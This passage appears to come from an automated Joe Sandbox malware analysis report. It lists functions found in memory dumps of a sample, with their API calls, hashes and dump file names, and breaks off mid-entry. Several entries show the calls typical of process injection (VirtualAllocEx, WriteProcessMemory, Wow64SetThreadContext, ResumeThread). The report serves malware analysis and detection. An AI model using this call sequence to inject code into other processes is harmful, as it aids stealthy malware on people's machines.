                                                        • Opcode ID: 5a21199bf67f49e0d0cf62d9f530991448d0fdb802393345124e5706f611dae7
                                                        • Instruction ID: ac1a6ddf2bde64b3305dad059425608cfe7d62b8f5ce688397d9b13a34573624
                                                        • Opcode Fuzzy Hash: 5a21199bf67f49e0d0cf62d9f530991448d0fdb802393345124e5706f611dae7
                                                        • Instruction Fuzzy Hash: 19316FB6D002198FDB10CFA9C841AEEFBF5FF88320F10842AE559A7241CB749945DF61
                                                        Function 02C22040 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02C220D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 0625f8c065853e839ea12cec837aad64f2b7ed85522f482f8847b643d3771f03
                                                        • Instruction ID: 39b611ad15bfab0ad257bc82161cdc617e4cc1d49a24cac0fce79ccdd1958802
                                                        • Opcode Fuzzy Hash: 0625f8c065853e839ea12cec837aad64f2b7ed85522f482f8847b643d3771f03
                                                        • Instruction Fuzzy Hash: F62139B59003199FCB10CFA9C981BDEBBF5FF48324F10842AE919A7241C7799944DBA1
                                                        Function 02C21F78 Relevance: 1.6, APIs: 1, Instructions: 66memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02C21FEE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: d1ff7f49293075928fefdd6b7b65f8b983541016e717e22f0674b8b86d06a009
                                                        • Instruction ID: 62a1b565c67f286a3b26851be220412abad047126d67cdddf56454ca0f377bac
                                                        • Opcode Fuzzy Hash: d1ff7f49293075928fefdd6b7b65f8b983541016e717e22f0674b8b86d06a009
                                                        • Instruction Fuzzy Hash: 93219AB1900389DFCB21CFA9C841ADEBFF1EF48364F24840AD559A7251CB799505CFA1
                                                        Function 02C21581 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ResumeThread.KERNELBASE(?), ref: 02C215EA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 4fb97214a56dbab191f784675fc2b4a684f4561acce3c68a8db4ee5f423fe180
                                                        • Instruction ID: 9f50e34841bf903e0df65e8b395326c7413c0cd023462a11785ba48aa81bc35f
                                                        • Opcode Fuzzy Hash: 4fb97214a56dbab191f784675fc2b4a684f4561acce3c68a8db4ee5f423fe180
                                                        • Instruction Fuzzy Hash: 952159B1D002498FCB20CFA9C8457EEFBF5EF88324F24845AD419A7251CB759945DF91
                                                        Function 02C25048 Relevance: 1.6, APIs: 1, Instructions: 65windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 02C250AD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 08ed56b38d6a8bab8ef1ac09d12971311b6993be1609e5b745a63074fdf3708f
                                                        • Instruction ID: 53900383722c76216aee2c0ccb0d110b8dfe0d3a48578cae302784bba1797b79
                                                        • Opcode Fuzzy Hash: 08ed56b38d6a8bab8ef1ac09d12971311b6993be1609e5b745a63074fdf3708f
                                                        • Instruction Fuzzy Hash: 382128B68003498FCB20DF99D985BDEFBF4EB58324F24845AD559A7201C379A548CFA1
                                                        Function 02C22130 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02C221B0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 72905f9c1c75dcca84be4693678387a80017e21aedd3ec218b7133f5608314bd
                                                        • Instruction ID: d2c77c5d2066818a9575c9c6713648a2b11e4a9aea8bfd7edaeef69103238e48
                                                        • Opcode Fuzzy Hash: 72905f9c1c75dcca84be4693678387a80017e21aedd3ec218b7133f5608314bd
                                                        • Instruction Fuzzy Hash: 092139B1D003599FCB10DFAAC981ADEFBF5FF48320F10842AE919A7250C7799944DBA1
                                                        Function 02C21638 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02C216B6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 028325b9e1fbc7ac8706a7803ae39cad8bce13fde7ac3f58e21580eee47e60b2
                                                        • Instruction ID: 38a76a51c24cb737350764212583cd7edabc269a3df21e9a711bfd228af593f6
                                                        • Opcode Fuzzy Hash: 028325b9e1fbc7ac8706a7803ae39cad8bce13fde7ac3f58e21580eee47e60b2
                                                        • Instruction Fuzzy Hash: 612138B1D003098FDB10DFAAC5857AEBBF5EF88324F14842AD419A7241CB789A44CFA1
                                                        Function 012DD678 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012DD707
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: ac8f2baa84ecbbc8cd0710c421618c854799415a49c1a49b4425f27a31d7be43
                                                        • Instruction ID: 6a42675310730cce552d6c39c5b11e4a1a0bac1d8c8b9505cdaf5196e193d456
                                                        • Opcode Fuzzy Hash: ac8f2baa84ecbbc8cd0710c421618c854799415a49c1a49b4425f27a31d7be43
                                                        • Instruction Fuzzy Hash: 2E21E0B5D102499FDB10CFAAD985ADEBBF5EB48320F24841AE918A7350D378A940DF61
                                                        Function 012DD680 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012DD707
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 8c42eb141d30478930246e7ed2b86c1de26d4066aa5f4ca8cd47b2cb83bfcab5
                                                        • Instruction ID: 5a7a3ba801c96579530ca2a73a82c17f3bb88d81551750e28b6187ba12bc3601
                                                        • Opcode Fuzzy Hash: 8c42eb141d30478930246e7ed2b86c1de26d4066aa5f4ca8cd47b2cb83bfcab5
                                                        • Instruction Fuzzy Hash: 9121E4B5D002499FDB10CF9AD984ADEBFF8EB48320F24801AE914A7350D378A940DF61
                                                        Function 012DA168 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012DB079,00000800,00000000,00000000), ref: 012DB28A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: fb9c4c435327257b403982309cacab590544df0ae4d4ac2e8b34cd4ef87bbab9
                                                        • Instruction ID: 52be28445cdc4dde1e81839839a9e88172408ec6398996a7f8845f964b1c2cce
                                                        • Opcode Fuzzy Hash: fb9c4c435327257b403982309cacab590544df0ae4d4ac2e8b34cd4ef87bbab9
                                                        • Instruction Fuzzy Hash: 831103B68002498FDB10CF9AC448B9EFBF4EB89310F14842AE519A7200C375A944CFA5
                                                        Function 012DB219 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012DB079,00000800,00000000,00000000), ref: 012DB28A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 4020993275e4a9937e4faac605b03f19dec90034f94229b49240986889400096
                                                        • Instruction ID: 27a07318c25231e03bb56d184ba938475e32ce4a08c1708870e0e6c24f149ea5
                                                        • Opcode Fuzzy Hash: 4020993275e4a9937e4faac605b03f19dec90034f94229b49240986889400096
                                                        • Instruction Fuzzy Hash: D71112BA8042499FDB14CFAAC444ADEFFF4AB89320F14842ED559A7310C379A945CFA5
                                                        Function 02C21F80 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02C21FEE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: ef70796d06a2ad45ffbb055b423778596bb065c38dfdf8f8ce83d50964a414d9
                                                        • Instruction ID: babfdd1cc6258ad2b2797b8af016b923ca7524d711049fda9b62fffd08fd093d
                                                        • Opcode Fuzzy Hash: ef70796d06a2ad45ffbb055b423778596bb065c38dfdf8f8ce83d50964a414d9
                                                        • Instruction Fuzzy Hash: 721167B19002498FCB20DFAAC845BDFBFF5EF88324F248419E519A7250CB75A900DFA1
                                                        Function 02C21588 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ResumeThread.KERNELBASE(?), ref: 02C215EA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 615780b88b8f38c5cd4a12f19cee943b9078ffef816e59e1f1584965a86a9c6c
                                                        • Instruction ID: c54d4a1b3931074ba9efcda8bdf86d896c01611b5daee9a6857b2b269c10f51c
                                                        • Opcode Fuzzy Hash: 615780b88b8f38c5cd4a12f19cee943b9078ffef816e59e1f1584965a86a9c6c
                                                        • Instruction Fuzzy Hash: 9F113AB1D003498FDB20DFAAC54579EFBF9EF88324F248419D519A7240CB79A944CFA5
                                                        Function 012DAF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 012DAFFE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685106601.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_12d0000_03.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 5b9abfe9688d24a1a8a8964fdef75831e389c31ce1fdea1d38931590d4d4d327
                                                        • Instruction ID: 1fcd27abfbd1dde08cec8dd03c02c7ea8a307ba2bdc53a841d472d35b912e65b
                                                        • Opcode Fuzzy Hash: 5b9abfe9688d24a1a8a8964fdef75831e389c31ce1fdea1d38931590d4d4d327
                                                        • Instruction Fuzzy Hash: F411DFB5C002498FDB24CF9AC544B9EFBF4EB88324F24845AD529A7610D379A545CFA1
                                                        Function 02C231F0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 02C250AD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1685538093.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c20000_03.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 16b95bd655a3d42a73924d460eb5a73e8081f97aad01fc8ffbc62b0d917e6732
                                                        • Instruction ID: 979ab71da1b53ce679157fa29eaed2e5c9605d5fdb07db5145535a7f04291120
                                                        • Opcode Fuzzy Hash: 16b95bd655a3d42a73924d460eb5a73e8081f97aad01fc8ffbc62b0d917e6732
                                                        • Instruction Fuzzy Hash: 9211F2B5800349DFDB20DF9AC985BDEBBF8EB48324F20845AE519A7240C375A944CFE5
                                                        Function 07183528 Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hjq
                                                        • API String ID: 0-3368716452
                                                        • Opcode ID: 082763a2fcf690491a8cc48460b9d857f2b099f8647bd9a55abd8f3d5f1e6546
                                                        • Instruction ID: b5c3e7d2bc01c4a12387fe7a322d80c52ce7cb43eb488af915785e3702f59cf2
                                                        • Opcode Fuzzy Hash: 082763a2fcf690491a8cc48460b9d857f2b099f8647bd9a55abd8f3d5f1e6546
                                                        • Instruction Fuzzy Hash: AB915D75A002499FCB05DFA8D9809EEBBF6FF89700B14806AE815EB351E735DD06CB91
                                                        Function 07183B04 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Tefq
                                                        • API String ID: 0-1066582953
                                                        • Opcode ID: 814e6f86b65ad83b75873ae47f9432b6af71abeca2d5836c51ffdbe268aa033d
                                                        • Instruction ID: 74c2bb25d9bb5ccbb51a157dd89bd26e13de99cbfdf3453523871af966622484
                                                        • Opcode Fuzzy Hash: 814e6f86b65ad83b75873ae47f9432b6af71abeca2d5836c51ffdbe268aa033d
                                                        • Instruction Fuzzy Hash: 5351A171B002068FCB15EF7998488BFBBB6EFC8324715856AE429DB391DF309D058B91
                                                        Function 0718323B Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'fq
                                                        • API String ID: 0-2007657732
                                                        • Opcode ID: cc46183428328335f51f6a24b5ba5b29d82d59609d10f4aa089f8858c2a04011
                                                        • Instruction ID: e3e16daeb30420489d68e8efdf4c5cb65a37a82396aec455d8c3c7f8963b38ba
                                                        • Opcode Fuzzy Hash: cc46183428328335f51f6a24b5ba5b29d82d59609d10f4aa089f8858c2a04011
                                                        • Instruction Fuzzy Hash: EF219D357102258BD714AB69D840ABFB7EAFFC8B00F10812AD90897391EAB59C068791
                                                        Function 07186908 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Tefq
                                                        • API String ID: 0-1066582953
                                                        • Opcode ID: 7d2345f8a98b8c86849f85cd8be64542ad99d3bdfac609d6510f23a1c8c449b5
                                                        • Instruction ID: f83608e94c271e5191cf92a188e525dfff422092578c887457f15d92917d1545
                                                        • Opcode Fuzzy Hash: 7d2345f8a98b8c86849f85cd8be64542ad99d3bdfac609d6510f23a1c8c449b5
                                                        • Instruction Fuzzy Hash: D3112171F0021A8FCB55EBB999106FFB7B6ABC9211F504469C514E7384EF318D11CB91
                                                        Function 0718279F Relevance: .3, Instructions: 294COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d2abd615adc8e6b103662d4bb32820a61e8e2928b23fb3df75f3c2070fa324b
                                                        • Instruction ID: 55067782c5d252201a4887ab1a6d4bd84b812192ed1fd63b655e9e8f0e8b0422
                                                        • Opcode Fuzzy Hash: 2d2abd615adc8e6b103662d4bb32820a61e8e2928b23fb3df75f3c2070fa324b
                                                        • Instruction Fuzzy Hash: 7AB1A2756147418FC30AEF38D854A9ABBF2FF8A300B1485AED4458B362DF31AD49CB91
                                                        Function 07182E17 Relevance: .3, Instructions: 252COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dbcbf6072c9a59ee66f26ef37f69477a1fb4dc87e8de1c182b577910ceab8d50
                                                        • Instruction ID: bed3b73fc7fcbc55c79c2bcc8ba3e321de22e386cdd4c26d0387f09f1d0956a1
                                                        • Opcode Fuzzy Hash: dbcbf6072c9a59ee66f26ef37f69477a1fb4dc87e8de1c182b577910ceab8d50
                                                        • Instruction Fuzzy Hash: C3A1A3756147418FC70AEB38D854A9D7BF2EF8A300B5485AED0468B361EF31AD49CB91
                                                        Function 07182E57 Relevance: .2, Instructions: 242COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1a1751c8a5b75cea7600145b7af391d2c37b0f5985b8a28357de87cdaf6d7b61
                                                        • Instruction ID: 1ea36e203e619cb0548320358ac153eac7d0362469f528da614d8cf516e80b93
                                                        • Opcode Fuzzy Hash: 1a1751c8a5b75cea7600145b7af391d2c37b0f5985b8a28357de87cdaf6d7b61
                                                        • Instruction Fuzzy Hash: FD9160752107418FC709EF38D854A9ABBF2FF8A300B5485AED45A8B361DF31AD49CB91
                                                        Function 0718CC48 Relevance: .2, Instructions: 200COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 04f3261eb08e2e198b185b461f45e40a9cf1310640e8ca0aa8309c59d03728d9
                                                        • Instruction ID: ccafc3932c5633ab3f76888c0f69942c0226ea915e5106e57c212e67a285885d
                                                        • Opcode Fuzzy Hash: 04f3261eb08e2e198b185b461f45e40a9cf1310640e8ca0aa8309c59d03728d9
                                                        • Instruction Fuzzy Hash: E581E7B0925209DBD744EFA9D0945AEFFBAFF4E301F11D195E419AB291C730A981CFA0
                                                        Function 07182EB0 Relevance: .2, Instructions: 196COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b63e6ef05b2400b1c548d16ebc9238a4cd6332ef37c71b9cd580c6b9dff42197
                                                        • Instruction ID: e1418f570665306cbf8c63f9e7f83cfb811bff4fdf2c612a241f48870cc99708
                                                        • Opcode Fuzzy Hash: b63e6ef05b2400b1c548d16ebc9238a4cd6332ef37c71b9cd580c6b9dff42197
                                                        • Instruction Fuzzy Hash: 18811B74210A048FC749EB38D494A9AB7E6FF89300B50896DE41A9B361DF31AD46DB91
                                                        Function 07184C87 Relevance: .1, Instructions: 143COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 757ff4000ec4c6837d6ad615b4b0ab58de90e170c362e28dcb77b2496d7a9c5a
                                                        • Instruction ID: 4ac00ffc0dfafb27e257d615b4e5b5ebbf3df5e73d19a5199d0642531e509c70
                                                        • Opcode Fuzzy Hash: 757ff4000ec4c6837d6ad615b4b0ab58de90e170c362e28dcb77b2496d7a9c5a
                                                        • Instruction Fuzzy Hash: 0A51D0B4909785CFC346DF69E554A98BFB0AF8A200B2681C2D984CF2B3DB319D15CB12
                                                        Function 0718BE50 Relevance: .1, Instructions: 133COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2e618eb14ca5820f4565dda9bcb4692287260c36306134f80ba9effbdb238860
                                                        • Instruction ID: 2c8e51f1310c73d562cd93e6caf18be14797a9c8a59aa0d7af1746ad2c178426
                                                        • Opcode Fuzzy Hash: 2e618eb14ca5820f4565dda9bcb4692287260c36306134f80ba9effbdb238860
                                                        • Instruction Fuzzy Hash: 7F41F5F4A18109CFCB58EB99C580AEDB7F9EB89310F159166E909B7391C730A945CFA0
                                                        Function 07184E3B Relevance: .1, Instructions: 123COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4c7a85d48123f26b20ec4da7cf5903cd465a00bcfb9a3027ebb143fe789d8c57
                                                        • Instruction ID: 5556523e8a2f67b973cfd3f33964a273ff723ba6e463b03de3bd84dda4fbf872
                                                        • Opcode Fuzzy Hash: 4c7a85d48123f26b20ec4da7cf5903cd465a00bcfb9a3027ebb143fe789d8c57
                                                        • Instruction Fuzzy Hash: D941E8B592526ADFCB44DFA8D4848EEBBB4FB4E200F029855E916BB350DB349810CF64
                                                        Function 07184E48 Relevance: .1, Instructions: 117COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a40623dba5a6044f2631cd3ff8312226cde0cba7168c7c24edd711b84d777f07
                                                        • Instruction ID: 08b4f61a190f2a5610d796bf976f4965379383460100d6d1998246d8f2afdc86
                                                        • Opcode Fuzzy Hash: a40623dba5a6044f2631cd3ff8312226cde0cba7168c7c24edd711b84d777f07
                                                        • Instruction Fuzzy Hash: DC41E9B5D2526ADFCB44DFA8D4848EEBBB4FB4E210F029455E916BB350DB349810CF64
                                                        Function 0718570B Relevance: .1, Instructions: 108COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 16b6ae8788b133629a1bc5cd6512826182015f47297a4ca1301b7dcb36d9a4a0
                                                        • Instruction ID: 0e1521515741acdf0a0f0a55d978f18670c6631913c46c35d2e3ca5f407564cd
                                                        • Opcode Fuzzy Hash: 16b6ae8788b133629a1bc5cd6512826182015f47297a4ca1301b7dcb36d9a4a0
                                                        • Instruction Fuzzy Hash: 7D419BB4E11219DFCB45DFA9C888AEDBBB2FB0A300F509025E816FB250DB349951DF24
                                                        Function 0718BB30 Relevance: .1, Instructions: 107COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 79fbe1528afed6b58f662b5d8c00de1df12b5eaec2094e7a8f4ae33a7602bea1
                                                        • Instruction ID: d93ebc163ee8ebe2bb925dea51ac7c783882f6b8dced5cb32c83f871d559b6f4
                                                        • Opcode Fuzzy Hash: 79fbe1528afed6b58f662b5d8c00de1df12b5eaec2094e7a8f4ae33a7602bea1
                                                        • Instruction Fuzzy Hash: E73126F0D1D2098BCB58DF9AC5406BEBBF6AB8E301F15E069D409A6295CB345A41CF58
                                                        Function 07184FC6 Relevance: .1, Instructions: 104COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
